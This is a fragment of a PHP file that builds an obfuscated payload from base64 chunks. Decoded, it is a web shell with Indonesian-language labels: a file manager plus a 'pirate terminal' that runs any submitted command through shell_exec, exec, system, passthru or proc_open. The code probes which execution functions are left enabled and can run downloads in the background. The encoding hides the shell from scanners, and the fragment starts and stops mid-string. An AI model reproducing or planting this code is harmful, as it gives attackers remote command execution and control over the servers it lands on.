$z .= "0KICAgICAgICAgICAgICAgICAgICBp";
$z .= "ZiAoc3RydG9sb3dlcihwYXRoaW5mby";
$z .= "gkX19pdGVtX18sIFBBVEhJTkZPX0VY";
$z .= "VEVOU0lPTikpID09ICd6aXAnKSB7DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICBlY2hvICc8YSBocmVmPSI/X19kX1";
$z .= "89JyAuIHVybGVuY29kZSgkX19kaXJf";
$z .= "XykgLiAnJl9fZXh0cmFjdF9fPScgLi";
$z .= "B1cmxlbmNvZGUoJF9faXRlbV9fKSAu";
$z .= "ICciIGNsYXNzPSJidG4gYnRuLWV4dH";
$z .= "JhY3QiPvCfk6YgRXh0cmFjdDwvYT4n";
$z .= "Ow0KICAgICAgICAgICAgICAgICAgIC";
$z .= "B9DQogICAgICAgICAgICAgICAgICAg";
$z .= "IGVjaG8gJzwvZGl2Pic7DQogICAgIC";
$z .= "AgICAgICAgICAgICAgIGVjaG8gJzwv";
$z .= "dGQ+JzsNCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgDQogICAgICAgICAgICAgICAg";
$z .= "ICAgIC8vIFJlbmFtZSBDb2x1bW4NCi";
$z .= "AgICAgICAgICAgICAgICAgICAgZWNo";
$z .= "byAnPHRkPic7DQogICAgICAgICAgIC";
$z .= "AgICAgICAgIGVjaG8gJzxhIGhyZWY9";
$z .= "Ij9fX2RfXz0nIC4gdXJsZW5jb2RlKC";
$z .= "RfX2Rpcl9fKSAuICcmX19yZW5hbWVf";
$z .= "Xz0nIC4gdXJsZW5jb2RlKCRfX2l0ZW";
$z .= "1fXykgLiAnIiBjbGFzcz0iYnRuIGJ0";
$z .= "bi1yZW5hbWUiPvCfk50gUmVuYW1lPC";
$z .= "9hPic7DQogICAgICAgICAgICAgICAg";
$z .= "ICAgIGVjaG8gJzwvdGQ+JzsNCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgDQogICAg";
$z .= "ICAgICAgICAgICAgICAgIGVjaG8gJz";
$z .= "wvdHI+JzsNCiAgICAgICAgICAgICAg";
$z .= "ICB9DQogICAgICAgICAgICAgICAgPz";
$z .= "4NCiAgICAgICAgICAgIDwvdGJvZHk+";
$z .= "DQogICAgICAgIDwvdGFibGU+DQogIC";
$z .= "AgICAgIA0KICAgICAgICA8IS0tIFRF";
$z .= "Uk1JTkFMIC0tPg0KICAgICAgICA8ZG";
$z .= "l2IGNsYXNzPSJ0ZXJtaW5hbCIgaWQ9";
$z .= "InRlcm1pbmFsIj4NCiAgICAgICAgIC";
$z .= "AgIDxoMyBzdHlsZT0ibWFyZ2luLWJv";
$z .= "dHRvbTogOHB4OyBmb250LXNpemU6ID";
$z .= "E0cHg7Ij7wn5KjIFRlcm1pbmFsIEJh";
$z .= "amFrIExhdXQg8J+SpTwvaDM+DQogIC";
$z .= "AgDQogICAgICAgICAgICA8IS0tIElu";
$z .= "Zm8gRWtzZWt1c2kgLS0+DQogICAgIC";
$z .= "AgICAgICA8P3BocA0KICAgICAgICAg";
$z .= "ICAgJF9fZXhlY19hdmFpbGFibGVfXy";
$z .= "A9IFtdOw0KICAgICAgICAgICAgJF9f";
$z .= "ZXhlY19mdW5jdGlvbnNfXyA9IFsNCi";
$z .= "AgICAgICAgICAgICAgICAnc2hlbGxf";
$z .= "ZXhlYycgPT4gJ/CfmoAgU2hlbGwgRX";
$z .= "hlYycsDQogICAgICAgICAgICAgICAg";
$z .= "J2V4ZWMnID0+ICfimqEgRXhlYycsDQ";
$z .= "ogICAgICAgICAgICAgICAgJ3N5c3Rl";
$z .= "bScgPT4gJ/CfkrsgU3lzdGVtJywNCi";
$z .= "AgICAgICAgICAgICAgICAncGFzc3Ro";
$z .= "cnUnID0+ICfwn5OhIFBhc3N0aHJ1Jy";
$z .= "wNCiAgICAgICAgICAgICAgICAncHJv";
$z .= "Y19vcGVuJyA9PiAn8J+UpyBQcm9jIE";
$z .= "9wZW4nDQogICAgICAgICAgICBdOw0K";
$z .= "ICAgIA0KICAgICAgICAgICAgJF9fZG";
$z .= "lzYWJsZWRfZnVuY3Rpb25zX18gPSBl";
$z .= "eHBsb2RlKCcsJywgaW5pX2dldCgnZG";
$z .= "lzYWJsZV9mdW5jdGlvbnMnKSk7DQog";
$z .= "ICAgICAgICAgICBmb3JlYWNoICgkX1";
$z .= "9leGVjX2Z1bmN0aW9uc19fIGFzICRm";
$z .= "dW5jID0+ICRsYWJlbCkgew0KICAgIC";
$z .= "AgICAgICAgICAgIGlmIChmdW5jdGlv";
$z .= "bl9leGlzdHMoJGZ1bmMpICYmICFpbl";
$z .= "9hcnJheSgkZnVuYywgJF9fZGlzYWJs";
$z .= "ZWRfZnVuY3Rpb25zX18pKSB7DQogIC";
$z .= "AgICAgICAgICAgICAgICAgICRfX2V4";
$z .= "ZWNfYXZhaWxhYmxlX19bXSA9ICRsYW";
$z .= "JlbDsNCiAgICAgICAgICAgICAgICB9";
$z .= "DQogICAgICAgICAgICB9DQogICAgDQ";
$z .= "ogICAgICAgICAgICBpZiAoIWVtcHR5";
$z .= "KCRfX2V4ZWNfYXZhaWxhYmxlX18pKS";
$z .= "B7DQogICAgICAgICAgICAgICAgZWNo";
$z .= "byAnPGRpdiBzdHlsZT0iYmFja2dyb3";
$z .= "VuZDojMWExYTFhOyBwYWRkaW5nOjVw";
$z .= "eCAxMHB4OyBtYXJnaW4tYm90dG9tOj";
$z .= "EwcHg7IGJvcmRlci1sZWZ0OjNweCBz";
$z .= "b2xpZCAjMGYwOyBmb250LXNpemU6MT";
$z .= "FweDsiPic7DQogICAgICAgICAgICAg";
$z .= "ICAgZWNobyAnPHNwYW4gc3R5bGU9Im";
$z .= "NvbG9yOiMwZjA7Ij7inIUgQWN0aXZl";
$z .= "Ojwvc3Bhbj4gJyAuIGltcGxvZGUoJy";
$z .= "B8ICcsICRfX2V4ZWNfYXZhaWxhYmxl";
$z .= "X18pOw0KICAgICAgICAgICAgICAgIG";
$z .= "VjaG8gJzwvZGl2Pic7DQogICAgICAg";
$z .= "ICAgICB9DQogICAgICAgICAgICA/Pg";
$z .= "0KICAgIA0KICAgICAgICAgICAgPGZv";
$z .= "cm0gbWV0aG9kPSJwb3N0IiBzdHlsZT";
$z .= "0iZGlzcGxheTpmbGV4OyBnYXA6NXB4";
$z .= "OyBtYXJnaW4tYm90dG9tOjEwcHg7Ij";
$z .= "4NCiAgICAgICAgICAgICAgICA8aW5w";
$z .= "dXQgdHlwZT0idGV4dCIgbmFtZT0iX1";
$z .= "9jbWRfXyIgDQogICAgICAgICAgICAg";
$z .= "ICAgICAgICAgIHZhbHVlPSI8P3BocC";
$z .= "BlY2hvIGlzc2V0KCRfUE9TVFsnX19j";
$z .= "bWRfXyddKSA/IGh0bWxzcGVjaWFsY2";
$z .= "hhcnMoJF9QT1NUWydfX2NtZF9fJ10p";
$z .= "IDogJyc7ID8+Ig0KICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICBwbGFjZWhvbGRl";
$z .= "cj0iQ29udG9oOiBscyAtbGEsIHB3ZC";
$z .= "wgcGhwIC12LCBjb21wb3NlciAtLXZl";
$z .= "cnNpb24iIA0KICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICBzdHlsZT0iZmxleDox";
$z .= "OyBwYWRkaW5nOjhweDsgYmFja2dyb3";
$z .= "VuZDojMTExOyBjb2xvcjojMGYwOyBi";
$z .= "b3JkZXI6MXB4IHNvbGlkICM1NTU7IG";
$z .= "JvcmRlci1yYWRpdXM6M3B4OyBmb250";
$z .= "LWZhbWlseTptb25vc3BhY2U7Ij4NCi";
$z .= "AgICAgICAgICAgICAgICA8YnV0dG9u";
$z .= "IHR5cGU9InN1Ym1pdCIgY2xhc3M9Im";
$z .= "J0biIgc3R5bGU9InBhZGRpbmc6OHB4";
$z .= "IDE1cHg7Ij7ilrYgSmFsYW5rYW48L2";
$z .= "J1dHRvbj4NCiAgICAgICAgICAgICAg";
$z .= "ICA8YnV0dG9uIHR5cGU9InN1Ym1pdC";
$z .= "IgbmFtZT0iX19iZ19fIiB2YWx1ZT0i";
$z .= "MSIgY2xhc3M9ImJ0biBidG4tZXh0cm";
$z .= "FjdCIgc3R5bGU9InBhZGRpbmc6OHB4";
$z .= "IDE1cHg7IiB0aXRsZT0iSmFsYW5rYW";
$z .= "4gZGkgYmFja2dyb3VuZCAodW50dWsg";
$z .= "cHJvc2VzIGxhbWEpIj7ij7MgQmFja2";
$z .= "dyb3VuZDwvYnV0dG9uPg0KICAgICAg";
$z .= "ICAgICAgPC9mb3JtPg0KICAgIA0KIC";
$z .= "AgICAgICAgICAgPGRpdiBzdHlsZT0i";
$z .= "YmFja2dyb3VuZDojMWExYTFhOyBwYW";
$z .= "RkaW5nOjVweCAxMHB4OyBtYXJnaW4t";
$z .= "Ym90dG9tOjEwcHg7IGJvcmRlci1sZW";
$z .= "Z0OjNweCBzb2xpZCAjRkZENzAwOyBm";
$z .= "b250LXNpemU6MTFweDsgY29sb3I6I2";
$z .= "NjYzsiPg0KICAgICAgICAgICAgICAg";
$z .= "IPCfk4IgQ3VycmVudDogPHNwYW4gc3";
$z .= "R5bGU9ImNvbG9yOiMwZjA7IiBpZD0i";
$z .= "Y3VycmVudC1kaXIiPjw/cGhwIGVjaG";
$z .= "8gaHRtbHNwZWNpYWxjaGFycygkX19k";
$z .= "aXJfXyk7ID8+PC9zcGFuPg0KICAgIC";
$z .= "AgICAgICAgPC9kaXY+DQogICAgDQog";
$z .= "ICAgICAgICAgICA8cHJlIHN0eWxlPS";
$z .= "JiYWNrZ3JvdW5kOiMxMTE7IHBhZGRp";
$z .= "bmc6MTVweDsgYm9yZGVyLXJhZGl1cz";
$z .= "o1cHg7IG1heC1oZWlnaHQ6NDAwcHg7";
$z .= "IG92ZXJmbG93OmF1dG87IGZvbnQtc2";
$z .= "l6ZToxMnB4OyBsaW5lLWhlaWdodDox";
$z .= "LjQ7IGJvcmRlcjoxcHggc29saWQgIz";
$z .= "MzMzsiPg0KICAgICAgICA8P3BocA0K";
$z .= "ICAgICAgICBpZiAoaXNzZXQoJF9QT1";
$z .= "NUWydfX2NtZF9fJ10pICYmICFlbXB0";
$z .= "eSgkX1BPU1RbJ19fY21kX18nXSkpIH";
$z .= "sNCiAgICAgICAgICAgICRfX2NtZF9f";
$z .= "ID0gJF9QT1NUWydfX2NtZF9fJ107DQ";
$z .= "ogICAgICAgICAgICAkX19iYWNrZ3Jv";
$z .= "dW5kX18gPSBpc3NldCgkX1BPU1RbJ1";
$z .= "9fYmdfXyddKTsNCiAgICANCiAgICAg";
$z .= "ICAgICAgIGVjaG8gIjxzcGFuIHN0eW";
$z .= "xlPSdjb2xvcjojRkZENzAwOyc+JDwv";
$z .= "c3Bhbj4gPHNwYW4gc3R5bGU9J2NvbG";
$z .= "9yOiMwZjA7Jz4iIC4gaHRtbHNwZWNp";
$z .= "YWxjaGFycygkX19jbWRfXykgLiAiPC";
$z .= "9zcGFuPlxuIjsNCiAgICAgICAgICAg";
$z .= "IGVjaG8gIjxzcGFuIHN0eWxlPSdjb2";
$z .= "xvcjojNjY2Oyc+IiAuIHN0cl9yZXBl";
$z .= "YXQoIuKUgCIsIDYwKSAuICI8L3NwYW";
$z .= "4+XG4iOw0KICAgIA0KICAgICAgICAg";
$z .= "ICAgaWYgKCFpc3NldCgkX1NFU1NJT0";
$z .= "5bJ19fdGVybV9kaXJfXyddKSkgew0K";
$z .= "ICAgICAgICAgICAgICAgICRfU0VTU0";
$z .= "lPTlsnX190ZXJtX2Rpcl9fJ10gPSAk";
$z .= "X19kaXJfXzsNCiAgICAgICAgICAgIH";
$z .= "0NCiAgICANCiAgICAgICAgICAgIGlm";
$z .= "IChzdHJwb3ModHJpbSgkX19jbWRfXy";
$z .= "ksICdjZCAnKSA9PT0gMCkgew0KICAg";
$z .= "ICAgICAgICAgICAgICRfX25ld19kaX";
$z .= "JfXyA9IHRyaW0oc3Vic3RyKCRfX2Nt";
$z .= "ZF9fLCAzKSk7DQogICAgICAgICAgIC";
$z .= "AgICAgaWYgKGVtcHR5KCRfX25ld19k";
$z .= "aXJfXykpIHsNCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgJF9fbmV3X2Rpcl9fID0g";
$z .= "Z2V0Y3dkKCk7DQogICAgICAgICAgIC";
$z .= "AgICAgfSBlbHNlaWYgKCRfX25ld19k";
$z .= "aXJfX1swXSAhPT0gJy8nICYmIHN0cn";
$z .= "BvcygkX19uZXdfZGlyX18sICc6Jykg";
$z .= "PT09IGZhbHNlKSB7DQogICAgICAgIC";
$z .= "AgICAgICAgICAgICRfX25ld19kaXJf";
$z .= "XyA9ICRfU0VTU0lPTlsnX190ZXJtX2";
$z .= "Rpcl9fJ10gLiAnLycgLiAkX19uZXdf";
$z .= "ZGlyX187DQogICAgICAgICAgICAgIC";
$z .= "AgfQ0KICAgICAgICANCiAgICAgICAg";
$z .= "ICAgICAgICAkX19uZXdfZGlyX18gPS";
$z .= "BzdHJfcmVwbGFjZShbJy8nLCAnXFwn";
$z .= "XSwgRElSRUNUT1JZX1NFUEFSQVRPUi";
$z .= "wgJF9fbmV3X2Rpcl9fKTsNCiAgICAg";
$z .= "ICAgICAgICAgICAkX19uZXdfZGlyX1";
$z .= "8gPSByZWFscGF0aCgkX19uZXdfZGly";
$z .= "X18pID86ICRfX25ld19kaXJfXzsNCi";
$z .= "AgICAgICAgICAgICAgICANCiAgICAg";
$z .= "ICAgICAgICAgICBpZiAoaXNfZGlyKC";
$z .= "RfX25ld19kaXJfXykpIHsNCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgJF9TRVNTSU";
$z .= "9OWydfX3Rlcm1fZGlyX18nXSA9ICRf";
$z .= "X25ld19kaXJfXzsNCiAgICAgICAgIC";
$z .= "AgICAgICAgICAgY2hkaXIoJF9fbmV3";
$z .= "X2Rpcl9fKTsNCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgZWNobyAiPHNwYW4gc3R5";
$z .= "bGU9J2NvbG9yOiMwZjA7Jz7inIUgUG";
$z .= "luZGFoIGtlOiAiIC4gaHRtbHNwZWNp";
$z .= "YWxjaGFycygkX19uZXdfZGlyX18pIC";
$z .= "4gIjwvc3Bhbj5cbiI7DQogICAgICAg";
$z .= "ICAgICAgICAgfSBlbHNlIHsNCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgZWNobyAi";
$z .= "PHNwYW4gc3R5bGU9J2NvbG9yOiNmZj";
$z .= "U1NTU7Jz7inYwgRGlyZWt0b3JpIHRp";
$z .= "ZGFrIGRpdGVtdWthbjogIiAuIGh0bW";
$z .= "xzcGVjaWFsY2hhcnMoJF9fbmV3X2Rp";
$z .= "cl9fKSAuICI8L3NwYW4+XG4iOw0KIC";
$z .= "AgICAgICAgICAgICAgIH0NCiAgICAg";
$z .= "ICAgICAgIH0gZWxzZSB7DQogICAgIC";
$z .= "AgICAgICAgICAgJF9fY3VycmVudF90";
$z .= "ZXJtX2Rpcl9fID0gJF9TRVNTSU9OWy";
$z .= "dfX3Rlcm1fZGlyX18nXTsNCiAgICAg";
$z .= "ICAgICAgICAgICAkX19vcmlnaW5hbF";
$z .= "9kaXJfXyA9IGdldGN3ZCgpOw0KICAg";
$z .= "ICAgICANCiAgICAgICAgICAgICAgIC";
$z .= "BpZiAoaXNfZGlyKCRfX2N1cnJlbnRf";
$z .= "dGVybV9kaXJfXykpIHsNCiAgICAgIC";
$z .= "AgICAgICAgICAgICAgY2hkaXIoJF9f";
$z .= "Y3VycmVudF90ZXJtX2Rpcl9fKTsNCi";
$z .= "AgICAgICAgICAgICAgICB9DQogICAg";
$z .= "ICAgIA0KICAgICAgICAgICAgICAgIG";
$z .= "lmICgkX19iYWNrZ3JvdW5kX18pIHsN";
$z .= "CiAgICAgICAgICAgICAgICAgICAgJF";
$z .= "9fbG9uZ19jb21tYW5kc19fID0gWydj";
$z .= "b21wb3NlcicsICducG0nLCAneWFybi";
$z .= "csICdnaXQgY2xvbmUnLCAnd2dldCcs";
$z .= "ICdjdXJsJywgJ3BocCBjb21wb3Nlci";
$z .= "ddOw0KICAgICAgICAgICAgICAgICAg";
$z .= "ICAkX19pc19sb25nX18gPSBmYWxzZT";
$z .= "sNCiAgICAgICAgICAgIA0KICAgICAg";
$z .= "ICAgICAgICAgICAgICBmb3JlYWNoIC";
$z .= "gkX19sb25nX2NvbW1hbmRzX18gYXMg";
$z .= "JF9fcGF0dGVybl9fKSB7DQogICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICBpZiAo";
$z .= "c3RycG9zKCRfX2NtZF9fLCAkX19wYX";
$z .= "R0ZXJuX18pICE9PSBmYWxzZSkgew0K";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICRfX2lzX2xvbmdfXyA9IHRy";
$z .= "dWU7DQogICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgYnJlYWs7DQogICAg";
$z .= "ICAgICAgICAgICAgICAgICAgICB9DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgIH0N";
$z .= "CiAgICAgICAgICAgIA0KICAgICAgIC";
$z .= "AgICAgICAgICAgICBpZiAoJF9faXNf";
$z .= "bG9uZ19fKSB7DQogICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICBpZiAoc3RydG91";
$z .= "cHBlcihzdWJzdHIoUEhQX09TLCAwLC";
$z .= "AzKSkgPT09ICdXSU4nKSB7DQogICAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgJF9fYmdfY21kX18gPSAnc3RhcnQg";
$z .= "L0IgJyAuICRfX2NtZF9fIC4gJyA+IE";
$z .= "5VTCAyPiYxJzsNCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgIH0gZWxzZSB7DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgJF9fYmdfY21kX18gPSAkX1";
$z .= "9jbWRfXyAuICcgPiAvZGV2L251bGwg";
$z .= "Mj4mMSAmIGVjaG8gJCEnOw0KICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgfQ0K";
$z .= "ICAgICAgICAgICAgICAgIA0KICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgJF9f";
$z .= "b3V0cHV0X18gPSBzaGVsbF9leGVjKC";
$z .= "RfX2JnX2NtZF9fKTsNCiAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgIGVjaG8gIj";
$z .= "xzcGFuIHN0eWxlPSdjb2xvcjojRkZE";
$z .= "NzAwOyc+4o+zIFByb3NlcyBiZXJqYW";
$z .= "xhbiBkaSBiYWNrZ3JvdW5kPC9zcGFu";
$z .= "PlxuIjsNCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgIGlmICghZW1wdHkoJF9f";
$z .= "b3V0cHV0X18pKSB7DQogICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgZWNo";
$z .= "byAiPHNwYW4gc3R5bGU9J2NvbG9yOi";
$z .= "MwZjA7Jz5QSUQ6ICIgLiB0cmltKCRf";
$z .= "X291dHB1dF9fKSAuICI8L3NwYW4+XG";
$z .= "4iOw0KICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgfQ0KICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgZWNobyAiPHNwYW4g";
$z .= "c3R5bGU9J2NvbG9yOiNjY2M7Jz5DZW";
$z .= "sgZGVuZ2FuOiBwcyBhdXggfCBncmVw";
$z .= "IFBJRDwvc3Bhbj5cbiI7DQogICAgIC";
$z .= "AgICAgICAgICAgICAgIH0gZWxzZSB7";
$z .= "DQogICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAkX19iYWNrZ3JvdW5kX18gPSBm";
$z .= "YWxzZTsNCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgfQ0KICAgICAgICAgICAgICAg";
$z .= "IH0NCiAgICAgICAgDQogICAgICAgIC";
$z .= "AgICAgICAgaWYgKCEkX19iYWNrZ3Jv";
$z .= "dW5kX18pIHsNCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgJF9fb3V0cHV0X18gPSAn";
$z .= "JzsNCiAgICAgICAgICAgICAgICAgIC";
$z .= "AgJF9fbWV0aG9kc19fID0gW107DQog";
$z .= "ICAgICAgICAgICANCiAgICAgICAgIC";
$z .= "AgICAgICAgICAgaWYgKGZ1bmN0aW9u";
$z .= "X2V4aXN0cygnc2hlbGxfZXhlYycpIC";
$z .= "YmICFpbl9hcnJheSgnc2hlbGxfZXhl";
$z .= "YycsICRfX2Rpc2FibGVkX2Z1bmN0aW";
$z .= "9uc19fKSkgew0KICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgJF9fb3V0cHV0X1";
$z .= "8gPSBAc2hlbGxfZXhlYygkX19jbWRf";
$z .= "XyAuICcgMj4mMScpOw0KICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgJF9fbWV0";
$z .= "aG9kc19fW10gPSAnc2hlbGxfZXhlYy";
$z .= "c7DQogICAgICAgICAgICAgICAgICAg";
$z .= "IH0NCiAgICAgICAgICAgIA0KICAgIC";
$z .= "AgICAgICAgICAgICAgICBpZiAoZW1w";
$z .= "dHkoJF9fb3V0cHV0X18pICYmIGZ1bm";
$z .= "N0aW9uX2V4aXN0cygnZXhlYycpICYm";
$z .= "ICFpbl9hcnJheSgnZXhlYycsICRfX2";
$z .= "Rpc2FibGVkX2Z1bmN0aW9uc19fKSkg";
$z .= "ew0KICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgQGV4ZWMoJF9fY21kX18gLiAn";
$z .= "IDI+JjEnLCAkX19saW5lc19fLCAkX1";
$z .= "9yZXR1cm5fXyk7DQogICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAkX19vdXRwdX";
$z .= "RfXyA9IGltcGxvZGUoIlxuIiwgJF9f";
$z .= "bGluZXNfXyk7DQogICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICAkX19tZXRob2Rz";
$z .= "X19bXSA9ICdleGVjJzsNCiAgICAgIC";
$z .= "AgICAgICAgICAgICAgfQ0KICAgICAg";
$z .= "ICAgICAgDQogICAgICAgICAgICAgIC";
$z .= "AgICAgIGlmIChlbXB0eSgkX19vdXRw";
$z .= "dXRfXykgJiYgZnVuY3Rpb25fZXhpc3";
$z .= "RzKCdzeXN0ZW0nKSAmJiAhaW5fYXJy";
$z .= "YXkoJ3N5c3RlbScsICRfX2Rpc2FibG";
$z .= "VkX2Z1bmN0aW9uc19fKSkgew0KICAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgb2";
$z .= "Jfc3RhcnQoKTsNCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgIEBzeXN0ZW0oJF";
$z .= "9fY21kX18pOw0KICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgJF9fb3V0cHV0X1";
$z .= "8gPSBvYl9nZXRfY2xlYW4oKTsNCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "RfX21ldGhvZHNfX1tdID0gJ3N5c3Rl";
$z .= "bSc7DQogICAgICAgICAgICAgICAgIC";
$z .= "AgIH0NCiAgICAgICAgICAgIA0KICAg";
$z .= "ICAgICAgICAgICAgICAgICBpZiAoZW";
$z .= "1wdHkoJF9fb3V0cHV0X18pICYmIGZ1";
$z .= "bmN0aW9uX2V4aXN0cygncGFzc3Rocn";
$z .= "UnKSAmJiAhaW5fYXJyYXkoJ3Bhc3N0";
$z .= "aHJ1JywgJF9fZGlzYWJsZWRfZnVuY3";
$z .= "Rpb25zX18pKSB7DQogICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICBvYl9zdGFydC";
$z .= "gpOw0KICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgQHBhc3N0aHJ1KCRfX2NtZF";
$z .= "9fKTsNCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICRfX291dHB1dF9fID0gb2";
$z .= "JfZ2V0X2NsZWFuKCk7DQogICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAkX19tZX";
$z .= "Rob2RzX19bXSA9ICdwYXNzdGhydSc7";
$z .= "DQogICAgICAgICAgICAgICAgICAgIH";
$z .= "0NCiAgICAgICAgICAgIA0KICAgICAg";
$z .= "ICAgICAgICAgICAgICBpZiAoZW1wdH";
$z .= "koJF9fb3V0cHV0X18pICYmIGZ1bmN0";
$z .= "aW9uX2V4aXN0cygncHJvY19vcGVuJy";
$z .= "kgJiYgIWluX2FycmF5KCdwcm9jX29w";
$z .= "ZW4nLCAkX19kaXNhYmxlZF9mdW5jdG";
$z .= "lvbnNfXykpIHsNCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICRfX2Rlc2NyaX";
$z .= "B0b3JzX18gPSBbDQogICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgMCA9Pi";
$z .= "BbInBpcGUiLCAiciJdLA0KICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgID";
$z .= "EgPT4gWyJwaXBlIiwgInciXSwNCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAyID0+IFsicGlwZSIsICJ3Il0N";
$z .= "CiAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgIF07DQogICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAkX19wcm9jZXNzX18gPS";
$z .= "BAcHJvY19vcGVuKCRfX2NtZF9fLCAk";
$z .= "X19kZXNjcmlwdG9yc19fLCAkX19waX";
$z .= "Blc19fLCAkX1NFU1NJT05bJ19fdGVy";
$z .= "bV9kaXJfXyddID8/IG51bGwpOw0KIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICAg";
$z .= "aWYgKGlzX3Jlc291cmNlKCRfX3Byb2";
$z .= "Nlc3NfXykpIHsNCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAkX19vdX";
$z .= "RwdXRfXyA9IHN0cmVhbV9nZXRfY29u";
$z .= "dGVudHMoJF9fcGlwZXNfX1sxXSk7DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgJF9fZXJyb3JfXyA9IHN0cm";
$z .= "VhbV9nZXRfY29udGVudHMoJF9fcGlw";
$z .= "ZXNfX1syXSk7DQogICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgZmNsb3Nl";
$z .= "KCRfX3BpcGVzX19bMF0pOw0KICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICAg";
$z .= "IGZjbG9zZSgkX19waXBlc19fWzFdKT";
$z .= "sNCiAgICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICBmY2xvc2UoJF9fcGlwZX";
$z .= "NfX1syXSk7DQogICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgcHJvY19jbG";
$z .= "9zZSgkX19wcm9jZXNzX18pOw0KICAg";
$z .= "ICAgICAgICAgICAgICAgICANCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICBpZiAoIWVtcHR5KCRfX2Vycm9yX1";
$z .= "8pKSB7DQogICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICRfX291dH";
$z .= "B1dF9fIC49ICJcbiIgLiAkX19lcnJv";
$z .= "cl9fOw0KICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgIH0NCiAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAkX1";
$z .= "9tZXRob2RzX19bXSA9ICdwcm9jX29w";
$z .= "ZW4nOw0KICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgfQ0KICAgICAgICAgICAg";
$z .= "ICAgICAgICB9DQogICAgICAgICAgIC";
$z .= "ANCiAgICAgICAgICAgICAgICAgICAg";
$z .= "aWYgKCFlbXB0eSgkX19tZXRob2RzX1";
$z .= "8pKSB7DQogICAgICAgICAgICAgICAg";
$z .= "ICAgICAgICBlY2hvICI8c3BhbiBzdH";
$z .= "lsZT0nY29sb3I6IzY2NjsgZm9udC1z";
$z .= "aXplOjEwcHg7Jz7wn5OhIHZpYTogIi";
$z .= "AuIGltcGxvZGUoJyDihpIgJywgJF9f";
$z .= "bWV0aG9kc19fKSAuICI8L3NwYW4+XG";
$z .= "4iOw0KICAgICAgICAgICAgICAgICAg";
$z .= "ICB9DQogICAgICAgICAgICANCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgaWYgKCFl";
$z .= "bXB0eSgkX19vdXRwdXRfXykpIHsNCi";
$z .= "AgICAgICAgICAgICAgICAgICAgICAg";
$z .= "IGVjaG8gaHRtbHNwZWNpYWxjaGFycy";
$z .= "gkX19vdXRwdXRfXyk7DQogICAgICAg";
$z .= "ICAgICAgICAgICAgIH0gZWxzZSB7DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICBlY2hvICI8c3BhbiBzdHlsZT0nY2";
$z .= "9sb3I6I2ZmNTU1NTsnPuKdjCBUaWRh";
$z .= "ayBhZGEgb3V0cHV0IGF0YXUgY29tbW";
$z .= "FuZCBleGVjdXRpb24gZGlzYWJsZWQ8";
$z .= "L3NwYW4+XG4iOw0KICAgICAgICAgIC";
$z .= "AgICAgICAgICB9DQogICAgICAgICAg";
$z .= "ICAgICAgfQ0KICAgICAgICANCiAgIC";
$z .= "AgICAgICAgICAgICBjaGRpcigkX19v";
$z .= "cmlnaW5hbF9kaXJfXyk7DQogICAgIC";
$z .= "AgICAgICB9DQogICAgICAgIH0NCiAg";
$z .= "ICAgICAgPz4NCiAgICAgICAgICAgID";
$z .= "wvcHJlPg0KICAgIA0KICAgICAgICAg";
